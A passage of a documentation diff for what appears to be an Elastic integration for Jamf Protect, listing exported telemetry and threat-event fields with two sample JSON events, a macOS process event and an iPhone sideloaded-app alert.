tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) | keyword | +| threat.tactic.reference | The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword | +| threat.technique.id | The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name | The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| threat.technique.name.text | Multi-field of `threat.technique.name`. | match_only_text | +| threat.technique.reference | The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.email | User email address. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | +| volume.bus_type | | keyword | +| volume.file_system_type | | keyword | +| volume.nt_name | | keyword | +| volume.product_id | | keyword | +| volume.product_name | | keyword | +| volume.removable | | boolean | +| volume.serial_number | | keyword | +| volume.size | | long | +| volume.vendor_id | | keyword | +| volume.vendor_name | | keyword | +| volume.writable | | boolean | + + +#### telemetry + +This is the `Telemetry` dataset. + +##### Example + +An example event for `telemetry` looks as following: + +```json +{ + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization ID used to identify different entities in a multi-tenant environment. Examples: AWS account ID, Google Cloud ORG ID, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container ID. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.code | Error code describing the error. | keyword | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host ID. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host IP addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type | keyword | +| jamf_protect.telemetry.arguments.addr | | keyword | +| jamf_protect.telemetry.arguments.am_failure | | keyword | +| jamf_protect.telemetry.arguments.am_success | | keyword | +| jamf_protect.telemetry.arguments.authenticated | | flattened | +| jamf_protect.telemetry.arguments.child.pid | | long | +| jamf_protect.telemetry.arguments.data | | keyword | +| jamf_protect.telemetry.arguments.detail | | keyword | +| jamf_protect.telemetry.arguments.domain | | keyword | +| jamf_protect.telemetry.arguments.fd | | keyword | +| jamf_protect.telemetry.arguments.flags | | keyword | +| jamf_protect.telemetry.arguments.flattened | | flattened | +| jamf_protect.telemetry.arguments.known_uid | | keyword | +| jamf_protect.telemetry.arguments.pid | | long | +| jamf_protect.telemetry.arguments.port | | long | +| jamf_protect.telemetry.arguments.priority | | long | +| jamf_protect.telemetry.arguments.process | | keyword | +| jamf_protect.telemetry.arguments.protocol | | keyword | +| jamf_protect.telemetry.arguments.request | | keyword | +| jamf_protect.telemetry.arguments.sflags | | keyword | +| jamf_protect.telemetry.arguments.signal | | keyword | +| jamf_protect.telemetry.arguments.target.port | | long | +| jamf_protect.telemetry.arguments.task.port | | long | +| jamf_protect.telemetry.arguments.type | | keyword | +| jamf_protect.telemetry.arguments.which | | keyword | +| jamf_protect.telemetry.arguments.who | | keyword | +| jamf_protect.telemetry.attributes.device | | keyword | +| jamf_protect.telemetry.attributes.file.access_mode | | keyword | +| jamf_protect.telemetry.attributes.file.system.id | | keyword | +| jamf_protect.telemetry.attributes.node.id | | keyword | +| jamf_protect.telemetry.attributes.owner.group.id | | keyword | +| jamf_protect.telemetry.attributes.owner.group.name | | keyword | +| jamf_protect.telemetry.dataset | | keyword | +| jamf_protect.telemetry.event_attributes.activity_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.assessments_enabled | | long | +| jamf_protect.telemetry.event_attributes.attributes.ctime | | date | +| jamf_protect.telemetry.event_attributes.attributes.mtime | | date | +| jamf_protect.telemetry.event_attributes.attributes.path | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.agent_bundle_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.agent_name | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.data_url_string | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.event_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.origin_url_string | | keyword | +| jamf_protect.telemetry.event_attributes.attributes.quarantine.timestamp | | date | +| jamf_protect.telemetry.event_attributes.attributes.requirement | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event.excluded_processes | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event.excluded_users | | keyword | +| jamf_protect.telemetry.event_attributes.audit_event_log_verbose_messages | | keyword | +| jamf_protect.telemetry.event_attributes.audit_level | | long | +| jamf_protect.telemetry.event_attributes.backtrace.frames.image_offset | | long | +| jamf_protect.telemetry.event_attributes.backtrace.frames.image_uuid | | keyword | +| jamf_protect.telemetry.event_attributes.build_alias_of | | keyword | +| jamf_protect.telemetry.event_attributes.build_version | | keyword | +| jamf_protect.telemetry.event_attributes.category | | keyword | +| jamf_protect.telemetry.event_attributes.cf_bundle_short_version_string | | keyword | +| jamf_protect.telemetry.event_attributes.cf_bundle_version | | keyword | +| jamf_protect.telemetry.event_attributes.dev_id_enabled | | long | +| jamf_protect.telemetry.event_attributes.event.message | | keyword | +| jamf_protect.telemetry.event_attributes.event.type | | keyword | +| jamf_protect.telemetry.event_attributes.file_event.exclusion_paths | | keyword | +| jamf_protect.telemetry.event_attributes.file_event.inclusion_paths | | keyword | +| jamf_protect.telemetry.event_attributes.file_event.use_fuzzy_match | | long | +| jamf_protect.telemetry.event_attributes.file_license_info.license_expiration_date | | date | +| jamf_protect.telemetry.event_attributes.file_license_info.license_key | | keyword | +| jamf_protect.telemetry.event_attributes.file_license_info.license_type | | keyword | +| jamf_protect.telemetry.event_attributes.file_license_info.license_version | | keyword | +| jamf_protect.telemetry.event_attributes.format_string | | keyword | +| jamf_protect.telemetry.event_attributes.job.completed_time | | date | +| jamf_protect.telemetry.event_attributes.job.creation_time | | date | +| jamf_protect.telemetry.event_attributes.job.destination | | keyword | +| jamf_protect.telemetry.event_attributes.job.format | | keyword | +| jamf_protect.telemetry.event_attributes.job.id | | keyword | +| jamf_protect.telemetry.event_attributes.job.processing_time | | date | +| jamf_protect.telemetry.event_attributes.job.size | | keyword | +| jamf_protect.telemetry.event_attributes.job.state | | keyword | +| jamf_protect.telemetry.event_attributes.job.title | | keyword | +| jamf_protect.telemetry.event_attributes.job.user | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.location | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.max_number_backups | | long | +| jamf_protect.telemetry.event_attributes.log.file.max_size_mega_bytes | | long | +| jamf_protect.telemetry.event_attributes.log.file.ownership | | keyword | +| jamf_protect.telemetry.event_attributes.log.file.permission | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_enabled | | long | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.access_key_id | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.region | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.secret_key | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.stream_name | | keyword | +| jamf_protect.telemetry.event_attributes.log.remote_endpoint_url | | keyword | +| jamf_protect.telemetry.event_attributes.mach_timestamp | | keyword | +| jamf_protect.telemetry.event_attributes.opaque_version | | keyword | +| jamf_protect.telemetry.event_attributes.parent_activity_identifier | | keyword | +| jamf_protect.telemetry.event_attributes.path | | keyword | +| jamf_protect.telemetry.event_attributes.process.id | | long | +| jamf_protect.telemetry.event_attributes.process.image.path | | keyword | +| jamf_protect.telemetry.event_attributes.process.image.uuid | | keyword | +| jamf_protect.telemetry.event_attributes.project_name | | keyword | +| jamf_protect.telemetry.event_attributes.sender.id | | long | +| jamf_protect.telemetry.event_attributes.sender.image.path | | keyword | +| jamf_protect.telemetry.event_attributes.sender.image.uuid | | keyword | +| jamf_protect.telemetry.event_attributes.sender.program_counter | | long | +| jamf_protect.telemetry.event_attributes.source | | keyword | +| jamf_protect.telemetry.event_attributes.source_version | | keyword | +| jamf_protect.telemetry.event_attributes.subsystem | | keyword | +| jamf_protect.telemetry.event_attributes.thread_id | | keyword | +| jamf_protect.telemetry.event_attributes.timestamp | | date | +| jamf_protect.telemetry.event_attributes.timezone_name | | keyword | +| jamf_protect.telemetry.event_attributes.trace_id | | keyword | +| jamf_protect.telemetry.event_attributes.unified_log_predicates | | keyword | +| jamf_protect.telemetry.event_attributes.version | | keyword | +| jamf_protect.telemetry.event_score | | long | +| jamf_protect.telemetry.exec_args.args | | flattened | +| jamf_protect.telemetry.exec_args.args_compiled | | keyword | +| jamf_protect.telemetry.exec_chain_child.parent.path | | text | +| jamf_protect.telemetry.exec_chain_child.parent.uuid | | keyword | +| jamf_protect.telemetry.exec_chain_parent.uuid | | keyword | +| jamf_protect.telemetry.exec_env.env.arch | | keyword | +| jamf_protect.telemetry.exec_env.env.compiled | | keyword | +| jamf_protect.telemetry.exec_env.env.malwarebytes_group | | keyword | +| jamf_protect.telemetry.exec_env.env.path | | text | +| jamf_protect.telemetry.exec_env.env.shell | | keyword | +| jamf_protect.telemetry.exec_env.env.ssh_auth_sock | | keyword | +| jamf_protect.telemetry.exec_env.env.tmpdir | | keyword | +| jamf_protect.telemetry.exec_env.env.xpc.flags | | keyword | +| jamf_protect.telemetry.exec_env.env.xpc.service_name | | keyword | +| jamf_protect.telemetry.exec_env.env_compiled | | keyword | +| jamf_protect.telemetry.exit.return.value | | long | +| jamf_protect.telemetry.exit.status | | keyword | +| jamf_protect.telemetry.file_event_info.eventid_wrapped | | boolean | +| jamf_protect.telemetry.file_event_info.history_done | | boolean | +| jamf_protect.telemetry.file_event_info.item.change_owner | | boolean | +| jamf_protect.telemetry.file_event_info.item.cloned | | boolean | +| jamf_protect.telemetry.file_event_info.item.created | | boolean | +| jamf_protect.telemetry.file_event_info.item.extended_attribute_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.finder_info_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.inode_metadata_modified | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_directory | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_file | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_hard_link | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_last_hard_link | | boolean | +| jamf_protect.telemetry.file_event_info.item.is_sym_link | | boolean | +| jamf_protect.telemetry.file_event_info.item.removed | | boolean | +| jamf_protect.telemetry.file_event_info.item.renamed | | boolean | +| jamf_protect.telemetry.file_event_info.item.updated | | boolean | +| jamf_protect.telemetry.file_event_info.kernel_dropped | | boolean | +| jamf_protect.telemetry.file_event_info.mount | | boolean | +| jamf_protect.telemetry.file_event_info.must_scan_sub_dir | | boolean | +| jamf_protect.telemetry.file_event_info.none | | boolean | +| jamf_protect.telemetry.file_event_info.own_event | | boolean | +| jamf_protect.telemetry.file_event_info.root_changed | | boolean | +| jamf_protect.telemetry.file_event_info.unmount | | boolean | +| jamf_protect.telemetry.file_event_info.user_dropped | | boolean | +| jamf_protect.telemetry.hardware_event_info.device.class | | keyword | +| jamf_protect.telemetry.hardware_event_info.device.name | | keyword | +| jamf_protect.telemetry.hardware_event_info.device.status | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.cf_plugin_types | | flattened | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.class_name_override | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.capability_flags | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.current_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.device_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.driver_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.io.power_management.max_power_state | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.iserial_number | | long | +| jamf_protect.telemetry.hardware_event_info.device_attributes.removable | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.usb.product_name | | keyword | +| jamf_protect.telemetry.hardware_event_info.device_attributes.usb.vendor_name | | keyword | +| jamf_protect.telemetry.header.action | | keyword | +| jamf_protect.telemetry.header.event_modifier | | keyword | +| jamf_protect.telemetry.header.time_milliseconds_offset | | long | +| jamf_protect.telemetry.header.version | | keyword | +| jamf_protect.telemetry.host_info.host.uuid | | keyword | +| jamf_protect.telemetry.identity.cd_hash | | keyword | +| jamf_protect.telemetry.identity.signer.id | | keyword | +| jamf_protect.telemetry.identity.signer.id_truncated | | keyword | +| jamf_protect.telemetry.identity.signer.type | | keyword | +| jamf_protect.telemetry.identity.team.id | | keyword | +| jamf_protect.telemetry.identity.team.id_truncated | | keyword | +| jamf_protect.telemetry.path | | keyword | +| jamf_protect.telemetry.process.effective.group.id | | keyword | +| jamf_protect.telemetry.process.effective.group.name | | keyword | +| jamf_protect.telemetry.process.effective.user.id | | keyword | +| jamf_protect.telemetry.process.effective.user.name | | keyword | +| jamf_protect.telemetry.process.group.id | | keyword | +| jamf_protect.telemetry.process.group.name | | keyword | +| jamf_protect.telemetry.process.name | | keyword | +| jamf_protect.telemetry.process.pid | | long | +| jamf_protect.telemetry.process.session.id | | keyword | +| jamf_protect.telemetry.process.terminal_id.addr | | keyword | +| jamf_protect.telemetry.process.terminal_id.ip_address | | ip | +| jamf_protect.telemetry.process.terminal_id.port | | long | +| jamf_protect.telemetry.process.terminal_id.type | | keyword | +| jamf_protect.telemetry.process.user.id | | keyword | +| jamf_protect.telemetry.process.user.name | | keyword | +| jamf_protect.telemetry.return.description | | keyword | +| jamf_protect.telemetry.signal_event_info.signal | | long | +| jamf_protect.telemetry.socket.inet.addr | | keyword | +| jamf_protect.telemetry.socket.inet.family | | keyword | +| jamf_protect.telemetry.socket.inet.id | | keyword | +| jamf_protect.telemetry.socket.unix.family | | keyword | +| jamf_protect.telemetry.socket.unix.path | | text | +| jamf_protect.telemetry.subject.audit.id | | keyword | +| jamf_protect.telemetry.subject.audit.user.name | | keyword | +| jamf_protect.telemetry.subject.effective.group.id | | keyword | +| jamf_protect.telemetry.subject.effective.group.name | | keyword | +| jamf_protect.telemetry.subject.effective.user.id | | keyword | +| jamf_protect.telemetry.subject.effective.user.name | | keyword | +| jamf_protect.telemetry.subject.process.name | | keyword | +| jamf_protect.telemetry.subject.process.pid | | long | +| jamf_protect.telemetry.subject.responsible.process.id | | keyword | +| jamf_protect.telemetry.subject.responsible.process.name | | keyword | +| jamf_protect.telemetry.subject.session.id | | keyword | +| jamf_protect.telemetry.subject.terminal_id.addr | | keyword | +| jamf_protect.telemetry.subject.terminal_id.port | | long | +| jamf_protect.telemetry.subject.terminal_id.type | | keyword | +| jamf_protect.telemetry.texts | | keyword | +| log.offset | Log offset | long | +| log.source.address | Source address from which the log event was read / sent from. | keyword | +| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword | +| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long | +| process.hash.sha1 | SHA1 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.pid | Process id. | long | +| process.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.real_group.name | Name of the group. | keyword | +| process.real_user.id | Unique identifier of the user. | keyword | +| process.real_user.name | Short name or login of the user. | keyword | +| process.real_user.name.text | Multi-field of `process.real_user.name`. | match_only_text | +| process.user.id | Unique identifier of the user. | keyword | +| process.user.name | Short name or login of the user. | keyword | +| process.user.name.text | Multi-field of `process.user.name`. | match_only_text | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| server.ip | IP address of the server (IPv4 or IPv6). | ip | +| server.port | Port of the server. | long | +| tags | List of keywords used to tag each event. | keyword | +| user.effective.id | Unique identifier of the user. | keyword | +| user.effective.name | Short name or login of the user. | keyword | +| user.effective.name.text | Multi-field of `user.effective.name`. | match_only_text | +| user.email | User email address. | keyword | +| user.group.id | Unique identifier for the group on the system/platform. | keyword | +| user.group.name | Name of the group. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + + +#### threats event stream + +This is the `Threats Event Stream` dataset. + +##### Example + +An example event for `web_threat_events` looks as following: + +```json +{ + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "module": "jamf_protect", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "jamf_protect": {}, + "message": "{\"event\":{\"metadata\":{\"schemaVersion\":\"1.0\",\"vendor\":\"Jamf\",\"product\":\"Threat Events Stream\"},\"timestamp\":\"2020-01-30T17:47:41.767Z\",\"alertId\":\"013b15c9-8f62-4bf1-948a-d82367af2a10\",\"account\":{\"customerId\":\"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25\",\"parentId\":\"7c302632-7ac4-4234-8ada-11d76feb3730\",\"name\":\"Customer\"},\"device\":{\"deviceId\":\"09f81436-de17-441e-a631-0461252c629b\",\"os\":\"IOS 11.2.5\",\"deviceName\":\"Apple iPhone 11 (11.2.5)\",\"userDeviceName\":\"Apple iPhone 11\",\"externalId\":\"5087dc0e-876c-4b0e-95ea-5b543476e0c4\"},\"eventType\":{\"id\":213,\"description\":\"Sideloaded App\",\"name\":\"SIDE_LOADED_APP_IN_INVENTORY\"},\"app\":{\"id\":\"com.apple.iBooks\",\"name\":\"Books\",\"version\":\"1.1\",\"sha1\":\"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2\",\"sha256\":\"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042\"},\"destination\":{\"name\":\"host\",\"ip\":\"ip\",\"port\":80},\"source\":{\"ip\":\"1.2.3.4\",\"port\":3025},\"location\":\"gb\",\"accessPoint\":\"AccessPoint\",\"accessPointBssid\":\"c6:9f:db:b1:73:5a\",\"severity\":6,\"user\":{\"email\":\"user@mail.com\",\"name\":\"John Doe\"},\"eventUrl\":\"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767\",\"action\":\"Detected\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| container.image.tag | Container image tags. | keyword | +| container.runtime | Runtime managing this container. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| destination.as.organization.name | Organization name. | keyword | +| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the 